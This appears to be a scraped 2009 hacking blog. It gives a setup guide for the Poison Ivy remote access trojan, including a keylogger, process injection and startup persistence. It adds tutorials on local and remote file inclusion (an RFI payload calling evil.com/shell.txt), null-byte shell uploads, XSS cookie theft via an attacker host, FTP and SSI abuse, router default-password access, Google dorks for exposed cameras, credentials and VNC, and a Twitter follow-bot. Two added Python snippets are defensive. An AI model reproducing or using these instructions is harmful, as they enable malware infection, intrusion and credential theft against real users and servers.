Poison Ivy

Saturday, November 14, 2009


--[DNS Set Up]--

+ Go to

http://www.no-ip.com/

+ Sign up, download their software (the IP updater) and install it
+ No-IP IP Updater download ->
http://download.cnet.com/No-IP-DUC-Dynamic-DNS-Update-Client/3000-10248_4-10055182.html?tag=lst-1&cdlPid=10375673

+ Sign in on the website and click Add a Host
+ This is where you create your DNS name: choose a name of your liking and pick a domain from the drop-down list
+ Click Create Host
+ Sign in with your No-IP details in the IP updater software and you should see the host you created just before. Now you're done setting up your host.



--[Downloading]--

Download all of the following

+ Poison Ivy 3.2 ->
http://www.poisonivy-rat.com/index.php?link=download

+ Poison Ivy 2.3 patch ->
http://www.4shared.com/file/110443811/139faf9a/poisionivy232-patch.html


--[Installing]--

+ Extract PI2.3.2.rar and poision.ivy.2.3.2-patch.rar
+ Copy poision.ivy.2.3.2-patch.exe to PI2.3.2
+ Run poision.ivy.2.3.2-patch.exe and click Patch
 


--[Client and Server Set Up]--

Setting up the Client
+ Run Poison Ivy 2.3.2.exe and go to File > New Client
+ This is where you decide the port that connections will come in through; use one your other apps won't be using.

 

+ Once you have decided on your port you're going to have to forward that port on your router/modem; I'm not going to go into a lot of detail on how to forward ports.
+ First, set up a static IP; you can find out how to do that here ->
http://www.portforward.com/networking/staticip.htm

+ Second, go to the site below and find your router/modem
http://www.portforward.com/

+ Third, select any app/game that shows up in the list and follow the directions, but replace the port they give you with the one you're using for Poison Ivy.
  
Setting up the Server
+ Go to File > New Server
+ Click Create Profile and select a profile name.
+ Enter your DNS name and port number, then click Add
+ Keep admin as the password or change it (if you change the password you must use the same one on the client or connections won't be accepted)



+ Choose an HKLM/Run name and click the Random button a few times to generate an ActiveX Key Name
+ Then click Next



+ Create your own Mutex or leave it as is.
+ Tick the next 3 boxes and select or type in a process to inject into, or leave it as is
+ Tick the keylogger box if that's what you want.
+ Click Next to proceed
 

+ Here you have the option to choose an icon
+ Ticking Execute Third-Party Application after build (upx.exe) will decrease your server's size when built
+ Click Generate, type in the name of your server and click Save.

--[Having Connection Problems?]--
+ If you find that you're no longer getting any connections, then:
1. Check whether the No-IP IP Updater has updated your current IP (you will need to update your DNS every time you restart your router/modem IF you have a dynamic IP).
2. Are you on a VPN? If yes, check whether your VPN allows traffic through your port; a lot of them don't.
3. If you have a lot of connections that are in, let's say, Minnesota or the USA in general, then consider that a lot of people turn off their computers at night when they go to sleep.

Server Flaws

Friday, November 13, 2009

Today I will be showing you many, many flaws on an internal server; we will go through PHP attacks, Java attacks, and URL manipulation.

Let's start with URL manipulation, shall we?

URL Manipulation

Well, let's say you find a login page for a certain website.
Go ahead and view the source.
If you see anything similar to:

index.php?file=login.php

then that is the PHP file including login.php. Here is an example of how the URL may look:

http://www.target.com/admin/index.php?file=login.php

Once we go there it will probably forbid access, because we did not enter anything and we do not have any session ID given by the server.

But don't you see anything suspicious on the page that is functioning (index.php?file=login.php)? Well, if you see anything cached on that page, such as password.php, you're in luck. Go to that exact PHP file. You can do this via: http://www.target.com/admin/index.php?file=password.php
And you might get back the administrator username and password, with no encryption in any format whatsoever (MD5, SHA1, etc.).

But administrators can go further to protect themselves, and there are more manipulations. Let's continue on to them.

Null Byte Includes

Now, in our last URL manipulation, we got access to the admin site, and while reviewing the source we found:

index.php?file=login.php

which gave us the password.php lead, which told us that if we replaced login.php with password.php it would show the administrative username and password without any encryption (MD5, SHA1, etc.).

But what if the administrators have knowledge and are smarter? What they think is that LFI is LFI, and if its original form doesn't work, it will never work. That is totally wrong. You can use null byte includes to get at the PHP/CGI source that is serving that file.

So basically let's say that password.php was forbidden for outside users; here is a sample of that request:

index.php?file=password.php

It showed content with the password without any encryption.
But once you go to it, you're forbidden. This can be changed by adding a null byte include. Here is how it would look:

index.php?file=password.php

That poisoned null byte gives us the ability to view the source of that .php file, thus giving us the password for the administrative user account.

This can be used for other destruction, such as viewing config.php, /etc/passwd, etc.

Null Byte Upload

Let's say you make an attempt to upload a shell to some website, but it replies with an error claiming it only accepts JPG, PNG, etc.

Well, most of you would say "Ugh, I'll just give up."
And others would say "I will just rename my shell to ShellName.php.jpg."

Both are wrong.

You can simply bypass this using a poison null byte upload.
How do you do this destructive attack? It's really simple; follow these steps:

1. Open Notepad
2. Copy and paste your PHP shell
3. File >> Save as >> shellname.php.jpg
4. Upload to the server

Our null byte () adds a URL-encoded format into .jpg, thus giving back our file (in most cases your shell).

LFI Tutorial

LFI stands for Local File Inclusion; it is basically URL traversal. Here is an example of an LFI URL:

victim.com/index.php?page=../../../../../../../etc/passwd

And here is an example of vulnerable code:

<?php
// Vulnerable: the page parameter goes straight from the request into include()
$page = $_GET['page'];
include($page);
?>

That PHP script should never be used, because $page is passed directly from the web page.

And the LFI URL shows what can happen if your $page is written like that.

The ../ sequences you see are called directory traversal; they let you move anywhere around the server using characters that represent up, down, etc.

Let's move on to the LFI URL itself and play around with it for a bit.

victim.com/index.php?page=../../../../../../../etc/passwd

What that does is go up the directories to /etc/passwd.
/etc/passwd is the file on a Linux box holding its encrypted passwords; just like Windows has its own encrypted password store (SAM), Unix has one as well.

Once they gain access to that file, they have the ability to view users and crack the encoded passwords via brute force.

But sometimes administrators can be smart, and this is where the poisoned null byte comes in handy: if you cannot access /etc/passwd, it probably means the administrator appended something to it.
So you can try:

victim.com/index.php?page=../../../../../../../etc/passwd

You can use a poison null byte because sometimes admins add something like .php or .txt to the end to make it harder for you to reach the file.
Fortunately you can easily bypass this using the poison null byte.
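As an added example, not code from the original post, here is in Python the page-resolution check that a safe version of the include() above needs: it URL-decodes the parameter once, rejects embedded null bytes and URLs, keeps the resolved path under a fixed directory so ../ cannot escape it, and finally allows only known page names. PAGES_DIR, ALLOWED_PAGES and resolve_page are names assumed for this example.

```python
import os
import urllib.parse
from typing import Optional

# Constructed for this example: the directory pages are included from and the
# only page names the application is supposed to serve (both assumptions).
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = frozenset({"index.php", "login.php", "help.php"})


def resolve_page(raw_param: str, base_dir: str = PAGES_DIR,
                 allowed: frozenset = ALLOWED_PAGES) -> Optional[str]:
    """Return the absolute file to include for ?page=<raw_param>, or None
    when the value must be refused. These are the checks a bare
    include($_GET['page']) never performs."""
    # 1. Decode exactly once, as the web server does. Decoding again would
    #    turn %2500 into a real NUL and reopen the null-byte trick.
    value = urllib.parse.unquote(raw_param)
    # 2. A NUL anywhere in the name is an attempt to cut off whatever the
    #    script appends (".php", ".txt"), so refuse it outright.
    if "\x00" in value:
        return None
    # 3. Anything with a scheme is a remote include attempt, not a page name.
    if "://" in value:
        return None
    # 4. Resolve the path and insist it is still inside base_dir, which
    #    defeats ../../../../etc/passwd and absolute paths alike.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, target]) != base:
        return None
    # 5. Even inside base_dir, only include names from the allowlist; this
    #    is what keeps a forgotten password.php from being served.
    if os.path.relpath(target, base) not in allowed:
        return None
    return target
```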

RFI Tutorial

RFI is most commonly used to deliver a shell to a web server, but it is not actually uploaded; it is just referenced by the web server itself.

RFI can be used for plenty of things, delivering password loggers, etc., but it's commonly used for its brilliant ability to store a shell.

Now if you're not familiar with what a shell is: a shell is a PHP script that is used to cd to directories, view dirs, gain access to MySQL, and find private files the server has stored on the web server.

How can this be a bad thing for you? They can leak an entire database using their access to MySQL; this database can contain usernames, passwords, emails, etc.

They can gain access to ANYTHING. Here is an example of an RFI attempt:

http://www.victim.com/index.php?page=htt...shell.txt?

That tells the web server to go to the page http://www.evil.com/shell.txt,
and how will it work, you may be asking yourself? Well, it will work because the .txt file is filled with PHP commands/tags that the PHP extension will interpret.

We need to add the ? because it's basically like URL traversal, but it's really not; it just points at that location (http://www.evil.com/shell.txt).

XSS

XSS is used a lot on search engines; it can also be used to point at an XSS shell.

But first, let's play around with JavaScript. Find yourself a search box and try typing this in:



That makes an alert box showing our keyword "Test".
So press Enter, and if it comes back with what we presented in our script, then the site is vulnerable to XSS.

You may be saying, is this only possible in JavaScript? No, there are HTML injections, which look similar to this:


sup



If you get the (sup) back, it is also vulnerable to HTML injection.

But we are focusing on JavaScript. Let's say we wanted to point someone at the XSS shell we created, which logs cookies. We can do this using this simple script:

<(meta) content="0;url=http://www.yourxsshell.com/attack.php" http-equiv="refresh">

That uses a meta tag to redirect to your XSS shell.

Here is an example of how that may look after it's encoded (this uses google.com as an example):

http://www.lapdonline.org/search_results...rch_terms=

There you go, it is encoded.

What you want to do is redirect it to your XSS shell, so you might need to modify my example.

Download XSS shell (includes info etc.)

http://www.darknet.org.uk/2006/12/xss-sh...door-tool/

Now once you send that XSS'd link, which includes your XSS shell, to somebody, you will log all of their cookies, session IDs, etc.

You can even put a Trojan download instead of an XSS shell, but you have to make it look well thought out.

FTP Hacking

FTP is the File Transfer Protocol on a web server; it is used to store files, view files, etc.

But there is a root account that holds all the permissions; we don't have root, and it would probably take forever to brute-force the account.

So a trick is to do the following:

1. Open Command Prompt
2. Type in: ftp http://www.target.com
3. Enter WRONG details.
4. Then, once you're done with that, type in: quote user ftp
then type in: quote cwd ~root
then type in: quote pass ftp

That quotes the user account ftp,
then it quotes the cwd of ~root.

Don't expect this to work on every website; some websites have anonymous login disabled, meaning this won't work as often as you expected it to.


Part 2

Robots.txt destruction:

Robots.txt is a text file used to control the spiders that visit your website. This file grants access to certain folders, file types, and specific files depending on the robot accessing the site.

Here is an example of Robots.txt:

User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Disallow: /nwshp
Disallow: /?
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /sorry/
Disallow: /imgres
Disallow: /keyword/
Disallow: /u/

Also, the same file may end with an entry such as:

Disallow: /admin/

This can be used as a URL traversal method.

Here is an example of how it may look:

http://www.host.com/disallowed directory/RandomLeters&symbols

Well, after you get a 404 ERROR page, you should see something like /../
You may remember from our LFI explanation that /../ is used to move to other directories, in this case giving us access to the disallowed directories that are listed in Robots.txt. For example:

http://www.host.com/disallowed directory/Abunchofrandomletters&symbols/../admin/

But do NOT expect this to work on every single website that has Robots.txt.

PPPoE Exposure

PPPoE is a method of transmitting PPP traffic over Ethernet to the Internet through a common broadband medium.

But sometimes even hosts do not have PPP tunneled (if they have it on their network).

PPP can be used over telnet, so that is what we will be focusing on.

First, you want to do an nmap scan via:

nmap -v -A host.com

You will need to wait until it is finished; we need to see what OS this runs, which will give us loads of information such as possible router info.

So after it's done you might want to go to Google and search:

Router-Name Default Password

Because in telnet, the PPPoE password is usually left at the default.

So, for example, if it prompts you for the user and password, you can try:

Admin
Password

Now, once you're in, you can cd to directories and view dirs; the /var section includes the ability to view messages, logs, etc.
You may want to focus on finding config.xml, because that includes CWMP, ACS, and possibly POP information.

If however you cannot get PPPoE access, you can run a brute-force attack, or you can try accessing certain locations such as cwmp.host.com. Usually these sites are put under HTTPS because they think it's a high level of encryption so it's harder to crack, but the password for that can easily be obtained using user-agent vulnerabilities, cookie spoofing, and also the FTP vulnerabilities which were discussed in our previous tutorial on web hacking.

The FTP vulnerabilities we discussed will get you a very high level of access, because it may include DBs, configs, etc.

Serverside Includes (Evil SSI)

The most common way to find one of these vulnerabilities is to simply use a search box. Server-side includes basically give the ability to view directories. Just so I can explain it in a more efficient way, let's say you're in the directory /admin and you have a search field, and you're wondering what else is in the /admin directory; well, you can simply use this:



ls is a command used to list directories, and cmd is basically a command prompt.

After we get a reply displayed along with directories, we can use rm to remove directories, for example:



We can do a lot of things, but these are just set examples.
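As an added example for the LFI, null byte, RFI, XSS and SSI sections above (not code from the original post): a small Python scanner that reads web server access log lines, decodes each request target and tags the request shapes this post describes, so a defender can pick them out of a log. The log lines, IPs and hostnames are constructed for the example.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample in Apache combined log format (IPs, hosts and times are
# made up); the requests mirror the shapes described in this post.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Nov/2009:10:01:02 +0000] "GET /index.php?file=login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [13/Nov/2009:10:01:09 +0000] "GET /index.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.7 - - [13/Nov/2009:10:01:15 +0000] "GET /index.php?file=password.php%00 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Nov/2009:10:02:30 +0000] "GET /index.php?page=http://www.evil.com/shell.txt? HTTP/1.1" 200 7710 "-" "curl/7.19"
10.0.0.9 - - [13/Nov/2009:10:03:41 +0000] "GET /search.php?q=%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A%2F%2Fwww.yourxsshell.com%2Fattack.php%22%3E HTTP/1.1" 200 220 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Nov/2009:10:04:02 +0000] "GET /admin/search.php?q=%3C%21--%23exec%20cmd%3D%22ls%22%20--%3E HTTP/1.1" 200 301 "-" "Mozilla/5.0"
"""

# Fields we need from each line: client IP, request target and status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# One rule per technique in the post, applied to the decoded request target.
RULES = [
    ("path_traversal", re.compile(r"\.\./|\.\.\\")),                       # LFI: ../ or ..\
    ("null_byte", re.compile("\x00")),                                      # %00 after decoding
    ("remote_include", re.compile(r"=(?:https?|ftp)://", re.I)),            # RFI: ?page=http://...
    ("html_injection", re.compile(r"<\s*(?:script|meta|iframe|img)\b", re.I)),  # XSS / HTML injection
    ("ssi_directive", re.compile(r"<!--\s*#")),                             # <!--#exec ... -->
]


def decode_target(target: str) -> str:
    """URL-decode until stable (max 3 rounds) so %2500 is seen as the NUL it becomes."""
    for _ in range(3):
        decoded = urllib.parse.unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_log(text: str) -> List[Dict[str, object]]:
    """One record per suspicious request: line, client IP, status, fired rules, decoded target."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue                      # not a request line we understand
        decoded = decode_target(match.group("target"))
        tags = [name for name, rx in RULES if rx.search(decoded)]
        if tags:                          # a 200 on one of these deserves a look first
            hits.append({"line": lineno, "ip": match.group("ip"),
                         "status": int(match.group("status")),
                         "tags": tags, "target": decoded})
    return hits
```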

Hack Using Google

1. Hack video cameras
Type this into Google: inurl:viewerframe?mode= or inurl:"viewerframe?mode=refresh" with the quotes, and click any result...
you can see cameras around the world, and you can move some cameras....


2. Search Google for free files
Type this into Google with the quotes: "intitle:index of" anything, and you
can download free files like music, movies, games and so on. For example I used this one, but you can write whatever you want, e.g. "intitle:index of" hacks. GO AND TRY:....
I found this one, RAPIDSHARE :P haven't tried it but it looks really good http://www.rapidshare1.com/rapidshare.com/ or this one http://www.leetupload.com/dbindex2/index...20Packers/



3. Get usage statistics for sites
Get traffic statistics for sites .... put this with the quotes into Google: intitle:"usage statistics for" "generated by webalizer" and choose the site...


4. Search for "ROBOTS"

Okay, I just don't know if this is useful, but it's not for me... but anyway I'll post it... Type this into Google with the quotes: "robots.txt" "disallow:" filetype:txt


5. Search for FTPs

Search for FTPs.... type this into Google: intitle:index of ws_ftp.ini and choose..:P


6. Get FrontPage sites' user name and password

This one is good ...but the bad thing is that you must decrypt the password
...It's DES encryption, so try using John the Ripper...
You must have FrontPage installed on your PC so you can DEFACE the page
Type this into Google with quotes and click any page: inurl:_vti_pvt "service.pwd"

7. Remote into another computer

Okay, this one is nice...you can take over someone's PC, but the problem is that you don't know the password...
so you will need to use a bruteforcer.... the best for this is any VNC bruteforcer
Type this into Google with quotes: "vnc desktop" inurl:5800. If you don't get many results change the number to 5801..then 5802 and so on...

8. Get full access to phpMyAdmin

This one is cool...you can get full control of someone's phpMyAdmin ....type this into Google: intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" and click any....

How to get tons of followers on Twitter

Wednesday, November 11, 2009

First (you may want to make a new Twitter account if you're paranoid about offline phishers), download it here:
http://autotwitterbot.com/download.php

Open it up, click "Manage Accounts" and then "Add."
Type in your user/pass and hit Add.
Highlight your account and click "Login".
Now it should redirect you a few times, but you should end up at the Twitter home page.

Go to this site and pick one of the names on the list.
http://www.pickmore.com/internet/highest-number-of-twitter-followers-2118

Go to that person's page on Twitter in ATB.

Click on the right hand side where it lists the number of followers.

Now you should be able to click the button at the top that says "Follow all"

Now just let it run overnight, and hopefully in the morning you should have tons of followers who followed you back.

Now if you want you can go to your following page and click "Unfollow all" so that you aren't following 2 billion people.

###Warning#### I just found out that Twitter might suspend your account if you follow too many people in a short amount of time. Try using the Limit Follow/Unfollow option.